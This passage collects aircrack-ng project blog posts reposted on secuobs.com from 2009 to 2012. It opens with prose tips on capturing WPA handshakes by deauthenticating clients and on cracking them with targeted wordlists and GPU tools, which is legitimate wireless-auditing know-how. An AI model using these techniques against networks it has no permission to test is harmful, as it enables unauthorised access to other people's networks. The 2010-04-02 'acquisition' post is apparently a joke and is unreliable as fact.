hard because getting the handshake can be tricky and also because cracking can take a lot of time due to passphrase length, 8 to 63 characters Important notes Never forget to read the documentation in the wiki Don't hack AP you don't own or if you don't have the permission to do it There are several things to consider when getting the handshake You need to be somehow close to both the AP and the client If you only have the client, you should use airbase-ng to get the client to connect to you If RXQ is below 70 then there is a good chance you'll get a partial handshake which will be unusable You MUST be on the same channel as the AP in airodump-ng, you will see RXQ column when on a fixed channel It is not necessary to keep deauthenticating the client, once or twice should be more than enough And let the client reconnect in order to get the handshake Each aireplay-ng tells you it sent deauthentication, it sent 128 or 256 deauth frames If you still don't get the handshake after reading the wiki and those tips, then you might want to have a look at WPA Packet Capture Explained tutorial in the wiki to help understand what's going on Tip It is always a good idea to clean up the capture to include one beacon the handshake before cracking it or submitting it to an online cracking service The reason is that YOU select the handshake to crack and don't let the tool on those services to select the handshake that might be the wrong one It might sound funny but it is true, there is 0pourcents chances to crack it if the passphrase is not in the dictionary and 100pourcents when it is in the dictionary So what you want to do is profiling your victim when cracking the handshake to include words phrases related to it You can also find a few tools on backtrack such as John The Ripper that will help you mangle the dictionary and add new words If you need to generate phrases such as number, check out 'crunch' Note that aircrack-ng doesn't mangle the wordlist and doesn't do any permutation, it just tries each passphrase against the handshake And in case you want to be able to 'pause' the cracking, use John The Ripper to output to stdout and pipe the results to aircrack-ng using -w - GPU cracking makes cracking much faster One of the best solution for that is oclHashcat-plus and it is much faster than pyrit Now that you've cracked the handshake, you might want to verify it People have been trying to connect to the AP but it is the wrong way of checking since there are a lot of variables involved such as distance, mac filtering, bad drivers, etc that will prevent you to connect even if the passphrase is valid So what you have to do is using airdecap-ng With WPA, since what you get with the handshake is a session key for a specific device, you can only decrypt the traffic after the handshake for that device Don't be fooled by airdecap-ng giving 0 frames decrypted when there are a few data frames encrypted with WPA, there might not be any traffic from that device after the handshake Hence why it is very important to be able to understand a capture file http://www.secuobs.com/revue/news/358726.shtmlhttp://www.secuobs.com/revue/news/358726.shtml Secuobs.com : 2012-02-12 02:57:54 - Aircrack ng - I've often seen questions like How can I get Aircrack-ng on my iPhone Android Symbian ADD YOUR OS Let me clarify the status for phones In order to have Aircrack-ng running on the phone, there are several requirements 1 Being able to cross compile because the CPU on your phone has a different architecture than the one on your computer So if you cannot find a cross compiler for that specific platform, forget it 2 A wireless card Most phones have one these days, so that's easy 3 If your phone is Linux based, you will also need to be able to be 'root' to run the commands 4 The driver must allow monitor mode That's usually where almost all phones fail because only a few have that Sometimes the card doesn't have a stable monitor mode The reason behind it is that it must be low power and cheap to manufacture so the chipset and its firmware is very limited To give you a quick answer, only one phone meets all the requirements with its internal card the Nokia N900 it needs the 'power' kernel available in the extra-devel repositories While doing monitor mode injection, the battery last about 4h iOS devices Forget it because it is never going to happen, Apple is consumer oriented and doesn't really care about the computer security industry Plus, iOS is too closed source and AFAIK the chipset is not capable of proper monitor mode You could argue that it is available via Cydia It's true but you don't have any monitor mode capabilities, so it doesn't worth it also don't bother sending me Cydia bug reports, I don't read them Android Forget it with the internal card However, it will be possible with an external USB card Dragorn, the author of Kismet Wireless is working on it Other OS Forget it for the same reasons as Apple http://www.secuobs.com/revue/news/357325.shtmlhttp://www.secuobs.com/revue/news/357325.shtml Secuobs.com : 2012-01-28 22:12:12 - Aircrack ng - After a long time and no updates on the blog, I'm back I hope to keep it active like before One of the question I see asked very often is what card should I use for Aircrack-ng or what laptop should I use As far as card goes, I can tell you that even though the wiki looks outdated it isn't updated because the information is still accurate , the Alfa AWUS036H Realtek 8187 is still a very good card Another very good one is the Rockland N3 Ralink chipset If you would like to capture and inject on 80211n networks, you can use a card compatible with carl9170 I use a Netgear WNDA3100 v1 Correct me if I'm wrong but I haven't been successful with new Ralink cards even though they support 80211n, something is missing in the driver to be able to have that capability in monitor mode There might be other compatible chipsets for 80211n maybe recent Intel cards but I haven't tested them so I can't confirm So, now about laptops and netbooks One of the best chipset for internal cards is still Atheros You can try getting a laptop with Atheros cards but it is not easy to find since vendors don't often advertise what card they use and in most cases it is because they use a Broadcom which are far from being the best cards When they do, it is usually an Intel So what I recommend about laptops and netbooks Get one that you like and you're comfortable with, don't worry about the wireless card that comes with it and use one of the cards mentioned above If you really want an internal card, you can replace the internal card with an Ubiquiti but keep in mind that some laptops have a BIOS lock that prevents using another card than the overpriced one they sell HP Compaq is known to do it I've heard Dell does it on some laptops too I don't know for others Another thing I've often seen is people who wants to get cards from local stores In my experience, local store 1 don't have a lot of choices 2 don't know what chipset their cards have and 3 don't really care about it That's why I always shop online for wireless cards There is a good chance you can find a compatible card on Amazon or eBay I'll cover phones and Access points in another post http://www.secuobs.com/revue/news/354639.shtmlhttp://www.secuobs.com/revue/news/354639.shtml Secuobs.com : 2010-09-25 00:57:38 - Aircrack ng - Aircrack-ng now has support to export WPA handshake information to Elcomsoft Wireless Security Auditor v3 project file since svn r1781 with '-E' thanks to beini's author As said in previous monthly news, migration mode attack WPA Migration Mode WEP is back to haunt you has been added to aireplay-ng and a few improvement were added to aircrack-ng More details in r1769 commit Forum Adding accurate chipset detection to airmon-ng More details can be found here Who has the longest airodump-ng session Poor man's Aircrack-ng distributor - A tool to distribute aircrack-ng, developped in Python minidwep-gtk, a gui of aircrack-ng in shell script, has been updated for BT4 final and BT4R1 Other A few tools for generating passphrases lists Live CD WEAKERTHAN2, another pentetration testing linux live cd was released a few weeks ago Beini, a small Live CD base on TinyCore Linux, is one year old chinese Scripts Wi-fEye 051 was released His author created 2 videos video 1 and video 2 Wifite, another GUI written in Python for Aircrack-ng http://www.secuobs.com/revue/news/251566.shtmlhttp://www.secuobs.com/revue/news/251566.shtml Secuobs.com : 2010-09-17 02:14:45 - Aircrack ng - NeoPwn changed their plan and prefer to release it when the final version is ready It will finally be called NeoPwn v2 They plan to do two betas Private beta containing the control panel, the injection driver and installer but the number of requests is limited Public beta without the control panel, injection driver and installer once the project has reached beta stage The final version will be free to download when it is completed and a safe installation process has been developped Their website contains more details about the release plan I tested the driver and so far it is working really well as you can see IMAGE Last month, the video was showing the injection test on the N900 If you watch carefully, you can note that one of the BSSID is 00 00 00 00 00 00 I first thought it was a bug in aircrack-ng but it's not I was told it's a unconfigured AP It only sends beacons and jumps on different channels If you're as curious as me, here is a capture file with just a beacon Forum WiFiCake-NG 17 is a Perl TK interface for manipulating the CSV of airodump-ng You can find more details in the forum thread here Their website contains a youtube video as well as a PDF manual for the application Other Hack4Fun made an interview with Christophe Devine BlackHat and Defcon presentation slides of Hole 196 WPA Too Blackhat presentation WPA Migration Mode WEP is back to haunt you Contains paper, presentation slides, videos and patches for Aircrack-ng and Kismet It is an attack against Cisco WPA Migration mode that allows WEP and WPA clients to associate to an AP with the same ESSID It will be integrated to Aircrack-ng http://www.secuobs.com/revue/news/248112.shtmlhttp://www.secuobs.com/revue/news/248112.shtml Secuobs.com : 2010-07-14 01:42:40 - Aircrack ng - This month I have some really interesting news A lot of people would like to have Aircrack-ng on their phone including me but unfortunatly most phones can't work due to their driver Do you remember when I talked about NeoPwn v2 which is BackTrack Mobile A beta will be released before BlackHat Defcon and will include Aircrack-ng What's really great is that injection works with the internal card of the N900 the original video can be downloaded here They also released 2 additional videos on Youtube BackTrack Mobile Nokia N900 - Packet Injection Aireplay-NG BackTrack Mobile Nokia N900 - Mac Address Changer Forum There's a new section in the forum for BackTrack Mobile Beini 121 was released It can be downloaded from its website Jano updated wesside-ng replacement, one-command WEP crack to save the key into a file criser released WepCrackGui 081, a GUI for Aircrack-ng in C Mono It can be downloaded on Sourceforge Other BlackHat conferences will happen the 28th and 29th Schedule can be found here Besides BlackHat, there will also be BSides Las Vegas There aren't as much talks as in BlackHat but they look really interesting Defcon 18 29 July - 1 August posted the final schedule a week ago Starting from 2011, the Wifi Alliance will not allow WEP and TKIP in certified Wifi devices You can read more about it on WiFiNetNews I missed the update v217 of the patch for FreeRadius-WPE Wireless Pwnage Edition released in May http://www.secuobs.com/revue/news/240265.shtmlhttp://www.secuobs.com/revue/news/240265.shtml Secuobs.com : 2010-06-07 23:59:45 - Aircrack ng - Here is the 5th edition of our monthly news Project We had some downtime on the server hosting trac and forum between the 16th and the 20th hardware issues and fortunatly nothing was lost You can read more in these 2 posts Trac and forum down and Trac and forum up again The forum will be moved to the new server in a bit more than 2 weeks The change will be transparent for you And that means only trac and buildbot are left on the old server They should be done before Defcon Forum Airoscript not dead It got some updates and is now renamed to Airoscript-ng To get it, type svn co http tracaircrack-ngorg svn branch airoscript-ng in a console Beini 121 was released a few days ago It can be downloaded it from its website minidwep-gtk, a GUI of aircrack-ng in shell script, has been updated to work with Aircrack-ng 11 criser, the author of WepCrackGui, is developping a QT frontend for WepCrackGUI that should be included in the next release, v09 You can find instructions to get the sources and test it in this post He also posted some screenshots You can follow him on twitter wepcrackgui Other I'll give a talk at Sharkfest about wireless security next week digininja released a Karma patch for hostapd It now works with ath5k and ath9k It should work with prism54 and various other cards but that's untested Backtrack 4 r1 was released Changes new kernel 2634-rc6 , packages updates, and new drivers Note that it is an unofficial build meant for assesing hardware incompatibilities with the new kernel The WiFi Alliances and WiGig announced alliance on multi-Gigabit wireless networks in the 60Ghz band It will allow up to 7 Gigabit s You can read more here The official press release can be found on WiGig website Here is another GUI in Java for Aircrack-ng GRIM WEPA http://www.secuobs.com/revue/news/229311.shtmlhttp://www.secuobs.com/revue/news/229311.shtml Secuobs.com : 2010-05-20 23:26:25 - Aircrack ng - You probably noticed earlier today that the trac and forum were working again They finally fixed the issue which was according to them probably a bad RAM module or the CPU fan by replacing completely the server but keeping the hard drive I would tend to think that it's the CPU fan that failed But whatever, it works again and that was what we all wanted http://www.secuobs.com/revue/news/224172.shtmlhttp://www.secuobs.com/revue/news/224172.shtml Secuobs.com : 2010-05-04 23:55:15 - Aircrack ng - Project - Aircrack-ng 11 was released a bit more than a week ago A lot of bug fixes including the buffer overflow in different tools and improvements have been done The most noticeable changes are the addition of airdrop-ng by TheX1le and the interaction in airodump-ng The following screenshot shows some of the possibilities of the interaction more details in the wiki and in the manpage In this case, when you color an AP, its clients are automatically colored the same Forum - criser released v08 of his C Mono GUI, wepcrack He uses git for his source control and if you want to use the latest source and don't know much git, read the following He is looking for someone who can design an icon for his software - Zermolo released permutator beta 13 It generates incremental wordlists dictionaries based on your needs The package by Jano contains the source code and an Ubuntu package Other - ShamanVirtuel released a GUI to capture WPA handshakes called Autohs-GUI His project is hosted on Google Code along with a few other programs http://www.secuobs.com/revue/news/218797.shtmlhttp://www.secuobs.com/revue/news/218797.shtml Secuobs.com : 2010-04-25 03:26:32 - Aircrack ng - Aircrack-ng 11 is released A lot of bug fixes including the buffer overflow in different tools and improvements have been done The most noticeable changes are the addition of airdrop-ng by TheX1le and the interaction in airodump-ng Here is the changelog - airdrop-ng New tool by TheX1le - airodump-ng, aircrack-ng, airdecap-ng, airbase-ng Fixed buffer overflow in airodump-ng due to forged eapol frame - aircrack-ng Fixed multicast detection WPA handshake detection - airodump-ng Added interaction see wiki for the commands - airodump-ng Fixed client time in netxml file - airtun-ng Add WDS and bridge support - airbase-ng automatically set privacy bit to 1 if WPA or WPA2 is used -Z or -z option - airmon-ng Updated iw URL for v0919 - airdriver-ng Fixed link for madwifi-ng - aireplay-ng Chopchop enhancement to not stop but wait on deauth packets - tkiptun-ng Fixed segfault - wesside-ng Fixed compilation bug with recent version of gcc - cygwin Compiling sqlite isn't necessary anymore, libsqlite3-devel package can be used - osdep Strict aliasing and x86_64 fix - osdep Add tap support for Darwin OS X Still require tuntaposx from sourceforge to work - All Fixed compilation on cygwin 17 - All Fixed compilation on recent version of OSX - manpages Fixed aireplay-ng manpage for attack 0 not disassociation packets, deauth packets - manpages Added the keys for interaction in airodump-ng - patches Added regulatory domains override patches for atheros drivers ath5k, ath9k and ar9170 - patches Added 2632 patch for r8187 driver ieee80211 - Makefiles Fixed make uninstall http://www.secuobs.com/revue/news/215776.shtmlhttp://www.secuobs.com/revue/news/215776.shtml Secuobs.com : 2010-04-06 01:19:11 - Aircrack ng - Forum - Patches to override the regulatory domain for ath5k, ath9k and ar9170 - The work on the C GUI for aircrack-ng, WepCrackGUI, continues And here is a blog post in italian about it - Beini now has its own website Here is the forum thread - A few useful posts about using John The Ripper and other programs to generate wordlists or use it with aircrack-ng Here and there Here is a script by Zermolo to generate wordlist with only numbers, called permutate and another post in the same thread about the same subject with JTR Creating custom rules for John Word field is an incremental word list generator Project news - ebfe, who created airolib-ng, released an exploit for airodump-ng, aircrack-ng, airdecap-ng You can find more information in his blog Post 1, Post 2, but it just makes the tools crash, no real exploit released It will be fixed in the next few days before the release v11 - Nearly everything has been moved to the new server, only forum, trac and buildbot needs to be moved - Do you remember I wrote that trac didn't display svn commits for some unknown reason That's now fixed, I just had to comment out a line in tracini - For those who can't open the website due to URL filtering, use whydoyoublockme It's not a mirror, it points to the exact same content as wwwaircrack-ngorg Other news - I'll speak at Sharkfest It will take place in the main campus at Standford University, June 14-17 Here is the schedule - Ever heard about NeoPwn Version 2 will be based on the Nokia N900 and will be Backtrack Mobile - Remember spoonwep and spoonwep 2 Shamanvirtuel is working on spoonwep 3 Public beta release is planned between 15th-30th April - If you're using SliTaz, they released v30 a week ago http://www.secuobs.com/revue/news/209089.shtmlhttp://www.secuobs.com/revue/news/209089.shtml Secuobs.com : 2010-04-02 00:20:24 - Aircrack ng - The BackTrack team is happy to announce the acquisition of the Aircrack-NG project, as well as a new, long awaited update to v 11 The acquisition will mark a turning point to the Aircrack-NG project in more than once sense, and we are looking forward to see the project grow The new version of Aircrack-ng to be renamed backcrack-ng is available in the SVN repositories for your testing http://www.secuobs.com/revue/news/208184.shtmlhttp://www.secuobs.com/revue/news/208184.shtml Secuobs.com : 2010-03-02 22:53:16 - Aircrack ng - Forum news - Beini 10 final was released Forum post - I'm happily surprised that the C Mono script developement for aircrack-ng is still active By the way, here is the project on sourceforge wepcrackgui The current version is 063 - A new version of minidwep-gtk, developped in shell script, gtk-server, zenity, kdialog, was released Here is a video of this script in action It is included in Beini 10 Trac news - Various small fixes makefile, manpage, - A patch for the r8187 ieee80211 driver on kernel 2632 and lower Installation instructions are updated - Compilation is fixed when compiling unstable stuff wesside-ng easside-ng and tkiptun-ng with a recent gcc version v44 General news - Aircrack-ng now has 4 years old I checked when the first news was posted and it was the 25th February 2006 Surprisingly, the 2 following news happened the 25th February this year - A new paper about TKIP attacks was released by hirte Enhanced TKIP Micheal Attacks - Airdrop-ng from TheX1le is now available in our subversion repository Here is the video of the talk at Shmoocon 2010 If you haven't seen it yet, Shmoocon 2010 videos and sometimes the slides too are available Last but not least, here is a very funny video of a woman calling Leo Laporte's Tech Guy Show claiming her WI-FI access has disappeared http://www.secuobs.com/revue/news/197316.shtmlhttp://www.secuobs.com/revue/news/197316.shtml Secuobs.com : 2010-02-04 00:07:09 - Aircrack ng - A few things happened last month - The google phone, Nexus One was rooted and it has a bcm4329 chipset and it looks promising - Airodump-ng in svn trunk now has interactive mode you can control it with keys You can find the documentation in the wiki - A really small only 10MB distribution based on MicroCore Linux, console only - I'm sure you saw it, Backtrack 4 was released a few weeks ago - OSX Compiling Ticket 687 should be fixed now svn trunk revision 1657 - New version of Beini 10 RC52 - The developement of the GUI in C Mono is quite active Last but not least, aircrack-ng will be 4 years old by the end of february http://www.secuobs.com/revue/news/188347.shtmlhttp://www.secuobs.com/revue/news/188347.shtml Secuobs.com : 2010-01-20 20:25:38 - Aircrack ng - The wiki and trac implement OpenSearch and when the browser notice there's an OpenSearch on the website, it add a small notification on which your can click to add the search engine Firefox shows it with a light blue shadow on the icon of the search textbox like that IE shows changes the color of the search engine selection to orange Just click on it, and you can add wiki and trac search engines to your favorite browser http://www.secuobs.com/revue/news/183750.shtmlhttp://www.secuobs.com/revue/news/183750.shtml Secuobs.com : 2010-01-09 22:14:04 - Aircrack ng - Actually, trac is not completely working It's better than before, we can commit but now we can't see them in the timeline and also the source browser is not working anymore I tried to debug a few days ago but I haven't found why it doesn't work The path to the svn repository is correct, permissions of trac and on the filesystem are correct so I'm a bit out of ideas About the commits, I updated to 10 and tagged it and also committed a few patches to fix bugs - Client first seen and last seen in kismet netxml file - Compilation on cygwin 17 - OSX patch Ticket 653 Tap support for Darwin OS X - Other small things The next bugs I'll take care of are - Ticket 704 Fix broadcast and multicast detection in aircrack-ng it still require some work - Ticket 498 Aircrack-ng does not support dictionaries over 2Gb - I'd like to fix another compilation bug on OSX Ticket 687 but I don't have access to any Mac so if anyone could give me an access to a mac with Darwin and another with Leopard, that's great If anybody is getting rid of a Mac with darwin leopard, we are really interested I haven't chosen the other bugs yet, but I still have in mind that WPA handshake detection has to be fixed enhanced and I remember a bug with airbase-ng not giving the Information Elements in the right order There are a few interesting programs and scripts in the forum, and I'd like to give them more visibility and even small scripts What are your ideas opinion about it I haven't forgotten the t-shirts They will be there soon I might do a few with the new logo for Shmoocon http://www.secuobs.com/revue/news/179934.shtmlhttp://www.secuobs.com/revue/news/179934.shtml Secuobs.com : 2010-01-03 23:40:56 - Aircrack ng - Hello everybody, First of all, we wish you a happy new year There was no news here and no commit on trac since some time but we never stoppped working Although svn commit wasn't working for us see previous blog entry for more details , we used the tickets to store all patches that have to be committed But I now have some good news, trac is working again Don't ask me why, I have absolutely no idea, and I didn't change anything except doing the usual updates So that means I'll commit everything to sync svn with 10 final and then start committing all patches that were added to tickets since August because they couldn't be committed and others that were planned for 11 That will take a few days I'll also try to update this blog at least once a month to tell you what happened during the last month in our forum, trac and on IRC Here are a few things that happened recently - Online WPA cracking services with cloud computing that was launched begin december then now with GPU - Injection and packet capture with aircrack-ng seems to work with the Nokia N900 I also read that it will have USB host soon - Beini 10-RC51 A wireless network security testing system,it is based on Tiny Core Linux - GUI for aircrack-ng in C using Mono - minidwep-gtk a GUI for aircrack-ng in shell script - Slitaz Aircrack-ng the base Slitaz cooking version plus the latest Aircrack-ng SVN version, wireless drivers patched for injection and other related tools I am also currently installing a new server Core i5 266Ghz, 8Gb Ram, 2x 80Gb SSD for aircrack-ng That will allow us to organize better the different parts and give a better service to our ever growing community Our webhoster offers ESXi and I first wanted to use it to virtualize our stuff but it takes too much time to stabilize it and IP management is a bit tricky expensive and since I didn't wanted to wait any longer, I switched to vmware server for the different parts - trac and buildbot - forum - downloads videos, patches, storage, archive, nightly builds, we currently have around 20Gb of stuff - photos and videos of the conventions btw, I'll soon post the pictures I took during 26C3 and of other conventions - a few other virtual machines for testing The main website and wiki will not be moved Last but not least, I would also like to thank again everybody who help us, not only the donations although important to pay the servers and domains , but everybody who contributes to the project in the forum, irc, in the wiki documentation and translations , bug reports and bug fixes, improvements, More to come in the following days http://www.secuobs.com/revue/news/177699.shtmlhttp://www.secuobs.com/revue/news/177699.shtml Secuobs.com : 2009-09-08 04:29:04 - Aircrack ng - Yes, 10 final, finally There are not much changes compared to the 10rc4, just a few fixes Here is the changelog - airserv-ng Now works fine between 32 and 64bit OSes - wesside-ng Fixed some endianness bugs - airodump-ng-oui-update Make sure the user is root when updating the file - airmon-ng Updated iw download link 0917 - All Fixed compilation with some gcc - patches Added missing patches from patchesaircrack-ngorg mac80211_2628-rc4-wl_frag ack_v3patch - manpage Updated aireplay-ng manpage - INSTALLING Removed now useless requirement for OSX installation - GUI windows Fixed 2nd selection of a capture file For those who use subversion, the sources are not in sync with the trunk The reason is that svn commit is currently broken It broke during a Debian update and we're still trying to figure out how to fix it It should be fixed by the end of September in one way or another We've pinpointed the issue and found that the reason is because of the authentication but since we did not change anything to the configuration, I have no idea why it suddenly broke If anybody knows how to fix it, that would be great Last but not least, we're also launching the new website and logo as explained in a previous post New Stuff Feedback is welcome IMAGE http://www.secuobs.com/revue/news/138600.shtmlhttp://www.secuobs.com/revue/news/138600.shtml Secuobs.com : 2009-09-04 04:19:27 - Aircrack ng - Brucon is getting closer As I said, I'll give a workshop friday 17h00 and saturday 09h00, I know, it's early and there will be 2 contests one each day The winner will receive an ALFA AWUS036E with a 5dbi antenna ALFA AWUS036E 5dbi antenna They will be run during the workshop and for both of them you need a laptop and a wireless card You can use the tools of your choice - The first one, friday, you'll have to find an access point outside the convention area - And saturday, you'll have to crack the key of an access point I haven't decided yet if it will be WEP or WPA More details will be given during the workshops IMAGE http://www.secuobs.com/revue/news/137698.shtmlhttp://www.secuobs.com/revue/news/137698.shtml Secuobs.com : 2009-08-07 20:15:22 - Aircrack ng - Hello everybody, sorry for not posting anything since some time now, but we have been really busy these days and we got new stuff for you - 10 rc4 last week - 10 final release date - Planned features in 11 - New logo - New website I guess you saw there was a release, 10rc4 a bit more than a week ago This fixes a lot of stuff and add some new It fixes compilation not only on linux but also on BSD plateforms OpenBSD compilation is fixed and others The changelog speaks by itself Here are some planned features for 11 - Be able to use directly cowpatty tables in aircrack-ng without having to convert them to airolib-ng - OSX capture and maybe injection with some adapters Ticket 623 - Improved WPA handshake detection - Bug fixes of course - We also have been working on a new website Here is a preview http wwwaircrack-ngorg new_indexhtml The goal of this new design is to be able to reduce the traffic on the website, currently around 1Tb each month and also to be give a quick access to important information As explained in an earlier post, it will not replace the wiki, it will just be the home page and be next to the wiki you can keep all your bookmarks If you still have any remark or improvements about the new design, you can still post them in the forum you don't need to register to post The logo contest is over and we have a new logo Here is a preview winner segini75 Last but not least, the new website and new logo will be launched at the same time as the 10 final release in a week or two if no big bugs are found in rc4 IMAGE http://www.secuobs.com/revue/news/128963.shtmlhttp://www.secuobs.com/revue/news/128963.shtml